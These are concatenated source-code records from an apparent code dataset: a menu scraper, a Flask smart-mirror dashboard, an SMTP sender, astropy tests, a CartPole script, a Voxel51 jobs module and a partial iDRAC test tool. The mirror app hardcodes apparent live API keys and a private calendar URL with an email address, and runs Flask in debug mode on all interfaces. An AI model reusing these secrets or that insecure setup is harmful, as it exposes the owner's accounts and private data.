menu_list:\n\t\tdining_halls.append(DiningHall(hall[0], [Meal(meal[0], [Station(station[0], [Item(item[0], item[1]) for item in station[1]]) for station in meal[1]]) for meal in hall[1]]))\n\treturn dining_halls\n\t\t\n\t\n\ndef do_scrape():\n\toptions = pull_options(\"http://www.campusdish.com/en-us/CSMA/VIRGINIA\")\n\tmenu_list = []\n\tfor option in options:\n\t\tmenu_list.append(get_menu(option[0], option[1]))\n\treturn convert_list(menu_list)\n\ndef run_scraper():\n\twhile True:\n\t\tdining_halls = do_scrape()\n\t\t#json = get_json(dining_halls)\n\t\t#open(\"scraper.out\", \"w\").write(json)\n\t\tinsert_all(dining_halls)\n\t\tprint(\"Scraper run complete at \" + str(time.strftime((\"%H:%M:%S\"))))\n\t\t#Sleep between tests\n\t\ttime.sleep(60 * 60)\n\t\n","sub_path":"python/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196680387","text":"import flask\nfrom flask import render_template\nimport feedparser\nimport random\nimport time\nimport json\nimport urllib\nimport datetime\nimport uuid\nfrom flask_oauthlib.client import OAuth\nimport config\n\n#from ics import Calendar\n#import pytz\n#from pytz import timezone\n#from newsapi import NewsApiClient\n\n\"\"\"\n--Weather api call: http://api.openweathermap.org/data/2.5/weather?appid=e422a718b0bc6e6633fe25bc86c5ee57&q=east%20grinstead,uk\nConditions list found here: http://openweathermap.org/weather-conditions\nUse on the first category\n\n--Quotes--\nLine per quote in quotes.txt. Line will be pulled randomly on load/every 30mins.\n\n--Tube data--\nhttps://api.tfl.gov.uk/Line/Mode/tube/Status?app_id=2a69bd54&app_key=f7dba5cab390f9e3c86e188408255324\n\nApplication ID: 2a69bd54 | Application Keys: f7dba5cab390f9e3c86e188408255324\n\n--Reload--\nCurrently set in index.html meta content=\"1800\" value in seconds.\n\n--Calendar URL--\nAppID: dmoeDVOF[sylCCA26059_@-\nAppID: 0f756d8d-6e4f-4b28-805a-41d4e7a92a0e\n\nhttps://outlook.office.com/api/v2.0/me/calendarview\n\nhttps://calendar.google.com/calendar/ical/cg1207%40gmail.com/private-70f93b7a241a13d283be8909ec02c2c9/basic.ics\n\"\"\"\n\nAPP = flask.Flask(__name__, template_folder='templates')\nAPP.debug = True\nAPP.secret_key = 'development'\nOAUTH = OAuth(APP)\nMSGRAPH = OAUTH.remote_app(\n 'microsoft', consumer_key=config.CLIENT_ID, consumer_secret=config.CLIENT_SECRET,\n request_token_params={'scope': config.SCOPES},\n base_url=config.RESOURCE + config.API_VERSION + '/',\n request_token_url=None, access_token_method='POST',\n access_token_url=config.AUTHORITY_URL + config.TOKEN_ENDPOINT,\n authorize_url=config.AUTHORITY_URL + config.AUTH_ENDPOINT)\n\n@APP.route('/login')\ndef login():\n \"\"\"Prompt user to authenticate.\"\"\"\n flask.session['state'] = str(uuid.uuid4())\n return MSGRAPH.authorize(callback=config.REDIRECT_URI, state=flask.session['state'])\n\n@APP.route('/login/authorized')\ndef authorized():\n \"\"\"Handler for the application's Redirect Uri.\"\"\"\n if str(flask.session['state']) != str(flask.request.args['state']):\n raise Exception('state returned to redirect URL does not match!')\n response = MSGRAPH.authorized_response()\n flask.session['access_token'] = response['access_token']\n return flask.redirect('/')\n\n@APP.route('/graphcall')\ndef graphcall():\n #Confirm user authentication by calling Graph and displaying some data.\n todaydate = datetime.datetime.now().date().strftime('%Y/%m/%d')\n endpoint = 
'me/calendarview?StartDateTime=2018-04-24T01:00:00&EndDateTime=2018-04-24T23:59:00'\n print(endpoint)\n #endpoint = 'me/calendarview' + '?StartDateTime=' + todaydate + '&EndDateTime=' + todaydate\n headers = {'SdkVersion': 'sample-python-flask',\n 'x-client-SKU': 'sample-python-flask',\n 'client-request-id': str(uuid.uuid4()),\n 'return-client-request-id': 'true'}\n outlookdata = MSGRAPH.get(endpoint, headers=headers).data['value']\n\n meetings = []\n\n for ev in outlookdata:\n event_item = ev['subject']\n meetings.append(event_item)\n\n #graphdata = outlookdata['value'][1]['subject']\n return flask.render_template('graphcall.html',\n graphdata=meetings,\n endpoint=config.RESOURCE + config.API_VERSION + '/' + endpoint,\n sample='Flask-OAuthlib')\n\n@MSGRAPH.tokengetter\ndef get_token():\n \"\"\"Called by flask_oauthlib.client to retrieve current access token.\"\"\"\n return (flask.session.get('access_token'), '')\n\n#THE ACTUAL PAGE\n@APP.route('/')\ndef index():\n #weather\n weather_url = 'http://api.openweathermap.org/data/2.5/weather?appid=e422a718b0bc6e6633fe25bc86c5ee57&units=metric&q=london,uk'\n weather_list = json.load(urllib.request.urlopen(weather_url))\n weather_description = weather_list['weather'][0]['description']\n weather_icon = weather_list['weather'][0]['icon']\n weather_icon_url = '/static/images/weather/' + weather_icon + '.svg'\n temperature = int(weather_list['main']['temp'])\n date=\"{:%A %d %B %Y}\".format(datetime.datetime.now().date())\n \n #quote\n random_quote = random.choice(open('quotes.txt').readlines())\n\n #Meetings list\n todaydate = datetime.datetime.now().date().strftime('%Y/%m/%d')\n endpoint = 'me/calendarview?StartDateTime=2018-04-24T01:00:00&EndDateTime=2018-04-24T23:59:00'\n print(endpoint)\n #endpoint = 'me/calendarview' + '?StartDateTime=' + todaydate + '&EndDateTime=' + todaydate\n headers = {'SdkVersion': 'keko-mirror',\n 'x-client-SKU': 'keko-mirror',\n 'client-request-id': str(uuid.uuid4()),\n 'return-client-request-id': 'true'}\n outlookdata = MSGRAPH.get(endpoint, headers=headers).data['value']\n \n meetings = []\n\n for ev in outlookdata:\n event_item = ev['start']['dateTime'][11:][:-11] + ' - ' + ev['end']['dateTime'][11:][:-11] + ' ' + ev['subject']\n meetings.append(event_item)\n\n #Tube URL\n tube_url=\"https://api.tfl.gov.uk/Line/Mode/tube/Status?app_id=2a69bd54&app_key=f7dba5cab390f9e3c86e188408255324\"\n tube_status = json.load(urllib.request.urlopen(tube_url))\n\n tube = []\n\n for s in tube_status:\n tube_item = s['id'] + ' - ' + s['lineStatuses'][0]['statusSeverityDescription']\n #if 'Good Service' not in tube_item:\n tube.append(tube_item.title())\n\n #BBC News feed\n bbcfeedurl = \"http://feeds.bbci.co.uk/news/rss.xml?edition=uk\"\n bbcfeed = feedparser.parse(bbcfeedurl)\n news = []\n\n for i in range(8):\n \titem = bbcfeed['items'][i]['title']\n \tnews.append(item)\n\n return render_template('index.html', temp=temperature, date=date, cal=meetings, news=news, quote=random_quote, tube=tube, weathericon=weather_icon_url)\n\nAPP.run(host='0.0.0.0', debug=True)\n\n\"\"\"app.secret_key = 'development'\nOAUTH = OAuth(app)\nMSGRAPH = OAUTH.remote_app(\n 'microsoft',\n consumer_key=config.CLIENT_ID,\n consumer_secret=config.CLIENT_SECRET,\n request_token_params={'scope': config.SCOPES},\n base_url=config.RESOURCE + config.API_VERSION + '/',\n request_token_url=None,\n access_token_method='POST',\n access_token_url=config.AUTHORITY_URL + config.TOKEN_ENDPOINT,\n authorize_url=config.AUTHORITY_URL + 
config.AUTH_ENDPOINT)\"\"\"\n\n\n\"\"\"quotedata= json.load(urllib.request.urlopen(\"http://quotes.rest/qod.json?category=management\"))\nquote = quotedata['contents']['quotes'][0]['quote']\nauthor = quotedata['contents']['quotes'][0]['author']\n#author = \"Voltaire\"\ndesc=weather_description.capitalize()\n#quote = 'Each player must accept the cards life deals him or her: but once they are in hand, he or she alone must decide how to play the cards in order to win the game.'\n\"\"\"\n\n#Calandar\n\"\"\"\ncalurl = \"https://calendar.google.com/calendar/ical/cg1207%40gmail.com/private-70f93b7a241a13d283be8909ec02c2c9/basic.ics\"\nc = Calendar(urllib.request.urlopen(calurl).read().decode('iso-8859-1'))\ncal = c.events\n\nmeetings = []\n\nfor i in range(6):\n event = cal[i]\n meetings.append(event.begin)\n\"\"\"\n\n\n#condition_id = weather_main[:2] #remove day/night\n #condition_id = '09'\n #condition_type = {'01' : 'clear sky', '02' : 'few clouds', '03' : 'Scattered Clouds', '04' : 'broken clouds', '09' : 'Shower rain', '10' : 'Rain', '11' : 'Thunderstorm', '13' : 'snow', '50' : 'mist'}\n #condition_color = {'01' : '0.55,0.4', '02' : '0.4,0.45', '03' : '0.3,0.3', '04' : '0.2,0.25', '09' : '0.1,0.2', '10' : '0.1,0.1', '11' : '0.25,0.05', '13' : '0.25,0.15', '50' : 'mist'}\n #return (condition_type.get(condition_id, 0))\n","sub_path":"keko_mirror.py","file_name":"keko_mirror.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266420957","text":"import smtplib, sys, datetime\n#Arg 1 is the From_email\nfrom_addr = str(sys.argv[1])\n#Arg 2 is the Password\npwd = str(sys.argv[2])\n#Arg 3 is the To Email\nto_addr = str(sys.argv[3])\n#Arg 4 is the subject\nsubj = str(sys.argv[4])\n#Arg 5 is the message\nmsg = str(sys.argv[5])\n#Arg 5 is the person it was generated for\nfur = str(sys.argv[6])\nfull_msg = \"From: %s\\nTo: %s\\nSubject: %s\\nDate: %s\\n\\n%s\" % ( from_addr, to_addr, subj, datetime.datetime.now().strftime( \"%d/%m/%Y %H:%M\" ), (msg+\"\\nThis has been atuomatically generated for \"+fur) )\nmailserver = smtplib.SMTP('smtp.office365.com',587)\nmailserver.ehlo()\nmailserver.starttls()\nmailserver.login(from_addr, pwd)\nmailserver.sendmail(from_addr,to_addr,full_msg)\nmailserver.quit()\n","sub_path":"Python/Mail.py","file_name":"Mail.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105978118","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\nimport numpy as np\n\nfrom matplotlib.transforms import Affine2D, IdentityTransform\n\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.visualization.wcsaxes.fitswcs import WCSWorld2PixelTransform\nfrom astropy.visualization.wcsaxes.fitswcs import transform_coord_meta_from_wcs\n\nWCS2D = WCS(naxis=2)\nWCS2D.wcs.ctype = ['x', 'y']\nWCS2D.wcs.cunit = ['km', 'km']\nWCS2D.wcs.crpix = [614.5, 856.5]\nWCS2D.wcs.cdelt = [6.25, 6.25]\nWCS2D.wcs.crval = [0., 0.]\n\nWCS3D = WCS(naxis=3)\nWCS3D.wcs.ctype = ['x', 'y', 'z']\nWCS3D.wcs.cunit = ['km', 'km', 'km']\nWCS3D.wcs.crpix = [614.5, 856.5, 333]\nWCS3D.wcs.cdelt = [6.25, 6.25, 23]\nWCS3D.wcs.crval = [0., 0., 1.]\n\n\ndef test_shorthand_inversion():\n \"\"\"\n Test that the Matplotlib subtraction shorthand for composing and inverting\n transformations works.\n \"\"\"\n w1 = WCS(naxis=2)\n w1.wcs.ctype = ['RA---TAN', 'DEC--TAN']\n w1.wcs.crpix = [256.0, 
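Mail.py above hand-formats the From:/To:/Subject: headers into one string; the standard library's EmailMessage builds them more safely. A sketch with placeholder addresses and credentials:

```python
import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg['From'] = 'sender@example.com'
msg['To'] = 'recipient@example.com'
msg['Subject'] = 'Status report'
msg.set_content('This has been automatically generated.')

with smtplib.SMTP('smtp.office365.com', 587) as server:
    server.starttls()
    server.login('sender@example.com', 'app-password')  # placeholder credentials
    server.send_message(msg)
```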
256.0]\n w1.wcs.cdelt = [-0.05, 0.05]\n w1.wcs.crval = [120.0, -19.0]\n\n w2 = WCS(naxis=2)\n w2.wcs.ctype = ['RA---SIN', 'DEC--SIN']\n w2.wcs.crpix = [256.0, 256.0]\n w2.wcs.cdelt = [-0.05, 0.05]\n w2.wcs.crval = [235.0, +23.7]\n\n t1 = WCSWorld2PixelTransform(w1)\n t2 = WCSWorld2PixelTransform(w2)\n\n assert t1 - t2 == t1 + t2.inverted()\n assert t1 - t2 != t2.inverted() + t1\n assert t1 - t1 == IdentityTransform()\n\n\n# We add Affine2D to catch the fact that in Matplotlib, having a Composite\n# transform can end up in more strict requirements for the dimensionality.\n\n\ndef test_2d():\n\n world = np.ones((10, 2))\n\n w1 = WCSWorld2PixelTransform(WCS2D) + Affine2D()\n pixel = w1.transform(world)\n world_2 = w1.inverted().transform(pixel)\n\n np.testing.assert_allclose(world, world_2)\n\n\ndef test_3d():\n\n world = np.ones((10, 3))\n\n w1 = WCSWorld2PixelTransform(WCS3D, slice=('y', 0, 'x')) + Affine2D()\n pixel = w1.transform(world)\n world_2 = w1.inverted().transform(pixel)\n\n np.testing.assert_allclose(world[:, 0], world_2[:, 0])\n np.testing.assert_allclose(world[:, 2], world_2[:, 2])\n\n\nCTYPE_CASES = [(' LON-TAN', ('longitude', None, None)),\n (' LAT-TAN', ('latitude', None, None)),\n ('HPLN-TAN', ('longitude', u.arcsec, 180.)),\n ('HPLT-TAN', ('latitude', u.arcsec, None)),\n ('RA---TAN', ('longitude', u.hourangle, None)),\n ('DEC--TAN', ('latitude', None, None)),\n ('spam', ('scalar', None, None))]\n\n\n@pytest.mark.parametrize(('ctype', 'coord_info'), CTYPE_CASES)\ndef test_coord_type_from_ctype(ctype, coord_info):\n\n wcs = WCS(naxis=1)\n wcs.wcs.ctype = [ctype]\n wcs.wcs.crpix = [256.0]\n wcs.wcs.cdelt = [-0.05]\n wcs.wcs.crval = [120.0]\n\n _, coord_meta = transform_coord_meta_from_wcs(wcs)\n\n assert coord_meta['type'][0] == coord_info[0]\n assert coord_meta['format_unit'][0] == coord_info[1]\n assert coord_meta['wrap'][0] == coord_info[2]\n","sub_path":"astropy/visualization/wcsaxes/tests/test_fitswcs.py","file_name":"test_fitswcs.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449774255","text":"import gym\nimport numpy as np\n\nSTEPS = None\nEPISODES = None\nENV = None\n\ndef to_action(parameters, observations): # -> action\n return int(np.matmul(parameters, observations) >= 0)\n\ndef run_episode(parameters):\n observations = ENV.reset()\n total_reward = 0\n for _ in range(STEPS):\n parameters \n observations, reward, done, info = ENV.step(\n to_action(parameters, observations))\n total_reward += reward\n if done: break\n return total_reward\n\ndef run_experiment(parameters):\n print(\"Experiment:\",parameters,end=\"\")\n avg_reward = 0\n for _ in range(EPISODES):\n avg_reward += run_episode(parameters)\n avg_reward /= EPISODES\n print(\"| Average Reward:\",avg_reward)\n return avg_reward\n\n\ndef init(_STEPS, _EPISODES):\n global STEPS, EPISODES, ENV\n STEPS, EPISODES = _STEPS, _EPISODES\n ENV = gym.make(\"CartPole-v0\")\n\ndef run(experiments):\n max_parameters = None\n max_reward = 0\n for parameters in experiments:\n average_reward = run_experiment(parameters)\n if average_reward > max_reward:\n max_parameters = parameters\n max_reward = average_reward \n print(\"-----------------------------------------\")\n print(\"Max Parameters :\", max_parameters)\n print(\"Max Reward :\", max_reward)\n return max_parameters, 
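The fitswcs tests above exercise world-to-pixel transforms; the underlying astropy round trip looks like this (header values copied from the test, with a tolerance check at the end):

```python
import numpy as np
from astropy.wcs import WCS

w = WCS(naxis=2)
w.wcs.ctype = ['RA---TAN', 'DEC--TAN']
w.wcs.crpix = [256.0, 256.0]
w.wcs.cdelt = [-0.05, 0.05]
w.wcs.crval = [120.0, -19.0]

pix = w.wcs_world2pix([[120.0, -19.0]], 0)  # world -> pixel (0-based origin)
world = w.wcs_pix2world(pix, 0)             # and back
np.testing.assert_allclose(world, [[120.0, -19.0]])
```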
max_reward","sub_path":"CartPole-v0/cartpole01.py","file_name":"cartpole01.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"54447844","text":"# -*- coding: utf-8 -*-\n# Advent of Code 2019 - Day 9\n\n# BOOST\nimport sys\nsys.path.append(\"../python_modules/custom\")\nfrom intcomputer import Intcomputer\n\ncom = Intcomputer(list(map(int, open(\"boost.txt\", \"r\").read().split(\",\"))))\n\ncom.input([2])\ncom.run()\n\nprint(\"Output:\", com.output()[0])\n","sub_path":"Day_9/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"141733067","text":"'''\nJob request creation and manipulation library for the Voxel51 Vision Services\nAPI.\n\n| Copyright 2017-2018, Voxel51, LLC\n| `voxel51.com `_\n'''\nimport voxel51.utils as voxu\n\n\nDATA_ID_FIELD = \"data-id\"\nSIGNED_URL_FIELD = \"signed-url\"\n\n\nclass JobState(object):\n '''Enum describing the possible states of a job.'''\n\n READY = \"READY\"\n QUEUED = \"QUEUED\"\n RUNNING = \"RUNNING\"\n FAILED = \"FAILED\"\n COMPLETE = \"COMPLETE\"\n\n\nclass JobExecutionError(Exception):\n '''Error raised when there is a problem with the execution of a job.'''\n pass\n\n\nclass JobRequest(voxu.Serializable):\n '''Class encapsulating a job request for the API.\n\n Attributes:\n analytic (str): the ID of the analytic to run\n inputs (dict): a dictionary mapping input names to RemoteDataPath\n instances\n parameters (dict): a dictionary mapping parameter names to values\n '''\n\n def __init__(self, analytic_id):\n '''Initializes a JobRequest instance for the given analytic.\n\n Args:\n analytic_id (str): the ID of the analytic to run\n '''\n self.analytic = analytic_id\n self.inputs = {}\n self.parameters = {}\n\n def set_input(self, name, path=None, **kwargs):\n '''Sets the input of the given name.\n\n The input value can be specified either as a RemoteDataPath instance\n or as valid keyword arguments to construct one.\n\n Args:\n name (str): the input name to set\n path (RemoteDataPath, optional): a RemoteDataPath instance. If not\n specified, valid kwargs must be provided\n **kwargs: valid argument(s) for RemoteDataPath()\n '''\n self.inputs[name] = path or RemoteDataPath(**kwargs)\n\n def set_data_parameter(self, name, path=None, **kwargs):\n '''Sets the data parameter of the given name.\n\n Data parameters are parameters that are defined by a RemoteDataPath\n instance and are read from cloud storage at runtime by the Vision\n Engine. The parameter can be specified either as a RemoteDataPath\n instance or as valid keyword arguments to construct one.\n\n Args:\n name (str): the input name to set\n path (RemoteDataPath, optional): a RemoteDataPath instance. 
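How the cartpole01.py helpers above are meant to be driven: sample random linear policies and keep the best. The module name, the STEPS/EPISODES values, and the candidate count are assumptions for the sketch; it also assumes the same classic gym version as the record (4-tuple step API).

```python
import numpy as np
import cartpole01 as cp  # assumes the record above is saved as cartpole01.py

cp.init(_STEPS=200, _EPISODES=5)
candidates = [np.random.uniform(-1.0, 1.0, 4) for _ in range(20)]  # 4 obs dims
best_params, best_reward = cp.run(candidates)
```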
If not\n specified, valid kwargs must be provided\n **kwargs: valid argument(s) for RemoteDataPath()\n '''\n self.parameters[name] = path or RemoteDataPath(**kwargs)\n\n def set_parameter(self, name, val):\n '''Sets the (non-data) parameter of the given name.\n\n Non-data parameters are parameters whose values are defined directly by\n a value that is JSON serializable.\n\n Args:\n name (str): the input name to set\n val: the parameter value, which must be JSON serializable\n '''\n self.parameters[name] = val\n\n @classmethod\n def from_dict(cls, d):\n '''Constructs a JobRequest instance from a JSON dictionary.\n\n Args:\n d (dict): a JSON dictionary defining a JobRequest instance\n\n Returns:\n a JobRequest instance\n '''\n job_request = cls(d[\"analytic\"])\n\n # Set inputs\n for name, val in d[\"inputs\"].items():\n job_request.set_input(name, path=RemoteDataPath.from_dict(val))\n\n # Set parameters\n for name, val in d[\"parameters\"].items():\n if RemoteDataPath.is_remote_path_dict(val):\n # Data parameter\n job_request.set_data_parameter(\n name, path=RemoteDataPath.from_dict(val))\n else:\n # Non-data parameter\n job_request.set_parameter(name, val)\n return job_request\n\n\nclass RemoteDataPath(voxu.Serializable):\n '''Class enapsulating a remote data path.\n\n Attributes:\n data_id (str): the ID of the data in cloud storage\n signed_url (str): a signed URL with access to the data of interest\n in third-party cloud storage\n '''\n\n def __init__(self, data_id=None, signed_url=None):\n '''Creates a RemoteDataPath instance defined by the given information.\n\n Exactly one keyword value must be supplied to this constructor.\n\n Args:\n data_id (str, optional): the ID of the data in cloud storage\n signed_url (str, optional): a signed URL with access to the data\n of interest in third-party cloud storage\n\n Raises:\n RemoteDataPathError if the instance creation failed\n '''\n self.data_id = data_id\n self.signed_url = signed_url\n if not self.is_valid:\n raise RemoteDataPathError(\"Invalid RemoteDataPath\")\n\n @classmethod\n def from_data_id(cls, data_id):\n '''Creates a RemoteDataPath instance defined by the given data ID.\n\n Args:\n data_id (str): the ID of the data in cloud storage\n\n Returns:\n a RemoteDataPath instance with the given data ID\n '''\n return cls(data_id=data_id)\n\n @classmethod\n def from_signed_url(cls, signed_url):\n '''Creates a RemoteDataPath instance defined by the given signed URL.\n\n Args:\n signed_url (str): a signed URL with access to the data of interest\n in third-party cloud storage\n\n Returns:\n a RemoteDataPath instance with the given signed URL\n '''\n return cls(signed_url=signed_url)\n\n @property\n def has_data_id(self):\n '''Determines whether this RemoteDataPath instance has a data ID.\n\n Returns:\n True if this instance has a data ID, and False otherwise\n '''\n return self.data_id is not None\n\n @property\n def has_signed_url(self):\n '''Determines whether this RemoteDataPath instance has a signed URL.\n\n Returns:\n True if this instance has a signed URL, and False otherwise\n '''\n return self.signed_url is not None\n\n @property\n def is_valid(self):\n '''Determines whether this RemoteDataPath instance is valid.\n\n Returns:\n True if this instance is valid, and False otherwise\n '''\n return self.has_data_id ^ self.has_signed_url\n\n @staticmethod\n def is_remote_path_dict(val):\n '''Determines whether the given value defines a valid RemoteDataPath\n dictionary.\n\n Args:\n val: either a JSON dictionary representation of a 
RemoteDataPath\n instance or another arbitrary value\n\n Returns:\n True if val is a valid RemoteDataPath JSON dictionary, and False\n otherwise\n '''\n return (\n isinstance(val, dict) and RemoteDataPath.from_dict(val).is_valid\n )\n\n @classmethod\n def from_dict(cls, d):\n '''Constructs a RemoteDataPath instance from a JSON dictionary.\n\n Args:\n d (dict): a JSON dictionary defining a RemoteDataPath instance\n\n Returns:\n a RemoteDataPath instance\n '''\n if DATA_ID_FIELD in d:\n return cls(data_id=d[DATA_ID_FIELD])\n elif SIGNED_URL_FIELD in d:\n return cls(signed_url=d[SIGNED_URL_FIELD])\n raise RemoteDataPathError(\"Invalid RemoteDataPath dict: %s\" % str(d))\n\n def _attributes(self):\n if self.has_data_id:\n return {\"data_id\": DATA_ID_FIELD}\n elif self.has_signed_url:\n return {\"signed_url\": SIGNED_URL_FIELD}\n raise RemoteDataPathError(\"Invalid RemoteDataPath\")\n\n\nclass RemoteDataPathError(Exception):\n '''Error raised when an invalid RemoteDataPath instance is found.'''\n pass\n","sub_path":"voxel51/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":7695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"123297051","text":"#===================================================================#\n# Tool Name: MiG5 iDRAC FVS Tool #\n# Version: 0.1 #\n# Edit by: Chris Liu 2017/12/14 #\n#===================================================================#\nimport sys\nimport datetime\nimport subprocess\nimport os\nimport time\nimport ctypes\n\nglobal VER\nVER = \"0.1\"\n\nglobal LOG_FILE\nLOG_FILE = \"test.log\"\n\nglobal ROOT_DIR\nROOT_DIR = os.getcwd()\n\nglobal LOG_DIR\nLOG_DIR = os.path.join(ROOT_DIR, \"Log\")\n\nglobal DEBUG_MODE\nDEBUG_MODE = True\n\nglobal FAIL_CONTINUE\nFAIL_CONTINUE = False\n\nglobal SLED_DPN\nSLED_DPN = \"0H910X\"\n\nFONT_NONE = 0\nFONT_WHITE = 1\nFONT_RED = 2\nFONT_GREEN = 3\nFONT_YELLOW = 4\n\nPASS_BANNER = \"\"\"\n######## ### ###### ###### #### ####\n## ## ## ## ## ## ## ## #### ####\n## ## ## ## ## ## #### ####\n######## ## ## ###### ###### ## ##\n## ######### ## ##\n## ## ## ## ## ## ## #### ####\n## ## ## ###### ###### #### ####\n\"\"\"\n\nFAIL_BANNER = \"\"\"\n######## ### #### ## #### ####\n## ## ## ## ## #### ####\n## ## ## ## ## #### ####\n###### ## ## ## ## ## ##\n## ######### ## ##\n## ## ## ## ## #### ####\n## ## ## #### ######## #### ####\n\"\"\"\n#===============================================================================\ndef INIT():\n\tglobal LOG_FILE\n\tglobal LOG_DIR\n\tglobal ASSET_TAG\n\tglobal SERVICE_TAG\n\n\tcmd = \"ifconfig -a eth0 | grep HWaddr | awk '{print $5}'\"\n\tsled_mac = subprocess.Popen(cmd, stdout = subprocess.PIPE, shell = True, universal_newlines = True).communicate()[0].split(\"\\n\")[0]\n\n\tcmd = \"ifconfig eth0 | grep \\\"inet addr:\\\"\"\n\tsled_ip = subprocess.Popen(cmd, stdout = subprocess.PIPE, shell = True, universal_newlines = True).communicate()[0].split(\"\\n\")[0].strip().split()[1].split(\":\")[1]\n\n\tf = open(\"/usr/local/scan/%s/scan.dat\"%(sled_mac), \"r\")\n\tret1 = f.readlines()\n\tfor i in range(len(ret1)):\n\t\tret1[i] = ret1[i].strip()\n\tf.close()\n\n\tsled_ppid = \"\"\n\n\tfor i in ret1:\n\t\tif(\"PPID\" in i):\n\t\t\tsled_ppid = i.split(\"=\", 1)[1].strip()\n\t\tif(\"Asset Tag\" in i):\n\t\t\tASSET_TAG = i.split(\"=\", 1)[1].strip()\n\t\tif(\"Service Tag\" in i):\n\t\t\tSERVICE_TAG = i.split(\"=\", 1)[1].strip()\n\n\tif(sled_ppid[2:8] != SLED_DPN):\n\t\tLog(\"SLED DPN Error (%s != %s)\"%(sled_ppid[2:8], 
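Typical composition of the jobs.py classes defined above; the analytic ID and data ID here are placeholders:

```python
from voxel51.jobs import JobRequest, RemoteDataPath

job = JobRequest('<ANALYTIC-ID>')
job.set_input('video', data_id='<DATA-ID>')  # builds a RemoteDataPath internally
job.set_parameter('fps', 5)                  # plain JSON-serializable value
print(job.inputs['video'].data_id, job.parameters['fps'])
```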
SLED_DPN), FONT_RED)\n\t\tsys.exit(-1)\n\n\tLOG_DIR = os.path.join(\"/usr/local/scan/%s\"%(sled_ppid))\n\n\tif(os.path.isdir(LOG_DIR) == False):\n\t\tos.mkdir(LOG_DIR)\n\n\tLOG_FILE = \"LOG_%s_%s.txt\"%(os.path.basename(__file__).split(\".\")[0], datetime.datetime.strftime(datetime.datetime.now(), \"%m%d-%H%M\"))\n#===============================================================================\ndef Banner(msg):\n\tline_0 = \"#\" + \"=\"*78 + \"#\"\n\tline_1 = \"#\" + \" \"*78 + \"#\"\n\ttmp_str = \"#\" + msg.center(78) + \"#\"\n\n\tif(sys.platform == \"win32\"):\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x08)\n\t\tprint(\"\")\n\t\tprint(line_0)\n\t\tprint(line_1)\n\t\tprint(tmp_str)\n\t\tprint(line_1)\n\t\tprint(line_0)\n\t\tprint(\"\")\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\telse:\n\t\tprint(\"\")\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_0))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_1))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(tmp_str))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_1))\n\t\tprint(\"\\033[35;1m%s\\033[0m\"%(line_0))\n\t\tprint(\"\")\n#===============================================================================\ndef Log(msg, color = FONT_WHITE):\n\ttmp = \"[%s] %s\\n\"%(datetime.datetime.strftime(datetime.datetime.now(), \"%y/%m/%d %H:%M:%S\"), msg)\n\n\ttry:\n\t\tf = open(os.path.join(LOG_DIR, LOG_FILE), \"a\")\n\t\tf.write(tmp)\n\t\tf.close()\n\texcept:\n\t\tprint(\"Logging Error!!\")\n\t\treturn\n\n\ttmp = tmp[:-1]\n\n\tif(color == FONT_RED):\n\t\tif(sys.platform == \"win32\"):\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x04 | 0x08)\n\t\t\tprint(tmp)\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\t\telse:\n\t\t\tprint(\"\\033[31;1m%s\\033[0m\"%(tmp))\n\telif(color == FONT_GREEN):\n\t\tif(sys.platform == \"win32\"):\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x02 | 0x08)\n\t\t\tprint(tmp)\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\t\telse:\n\t\t\tprint(\"\\033[32;1m%s\\033[0m\"%(tmp))\n\telif(color == FONT_YELLOW):\n\t\tif(sys.platform == \"win32\"):\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x02 | 0x04 | 0x08)\n\t\t\tprint(tmp)\n\t\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\t\telse:\n\t\t\tprint(\"\\033[33;1m%s\\033[0m\"%(tmp))\n\telif(color == FONT_NONE):\n\t\tpass\n\telse:\n\t\ttry:\n\t\t\tprint(tmp)\n\t\texcept:\n\t\t\tprint(\"Logging Error!!\")\n#===============================================================================\ndef Show_Pass():\n\tif(sys.platform == \"win32\"):\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x02 | 0x08)\n\t\tprint(PASS_BANNER)\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 